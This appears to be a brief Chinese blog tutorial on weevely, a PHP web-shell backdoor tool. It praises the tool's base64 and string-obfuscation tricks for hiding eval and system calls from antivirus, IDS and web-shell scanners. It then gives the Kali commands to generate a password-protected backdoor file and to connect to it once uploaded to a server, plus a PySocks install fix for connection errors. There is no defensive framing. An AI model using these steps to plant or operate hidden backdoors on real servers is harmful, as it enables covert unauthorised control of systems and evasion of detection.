php後門管理工具weevely

weevely是一款php後門管理工具，使用http頭進行指令傳輸，功能強大。不過只支持php。

weevely生成的服務器端php代碼是通過了base64編碼的，因此能夠騙過主流的殺毒軟件和IDS，上傳服務器端代碼後一般能夠經過weevely直接運行。weevely所生成的PHP後門所使用的方法是如今比較主流的base64加密結合字符串變形技術，後門中所使用的函數均是經常使用的字符串處理函數，被做爲檢查規則的eval，system等函數都不會直接出如今代碼中，從而能夠導致後門文件繞事後門查找工具的檢查。使用暗組的Web後門查殺工具進行掃描，結果顯示該文件無任何威脅。

weevely的使用很簡單，首先咱們生成一個名爲weevely.php密碼爲 321的後門：

root@kali:~#weevely generate 321 /root/weevely.php  

將後門上傳到服務器以後運行

root@kali:~#weevely <url> <passwd> 

就能連上了

可是我在連的時候發現一個問題。

解決方案以下：

1) Download last PySocks from python site https://pypi.python.org/pypi/PySocks/
2) Unzip archive into /tmp/ directory
3) Run "chmod 755 /tmp/PySocks/setup.py"
4) Run build "/tmp/PySocks/setup.py build"
5) Run install "/tmp/PySocks/setup.py install"
而後就能夠連上了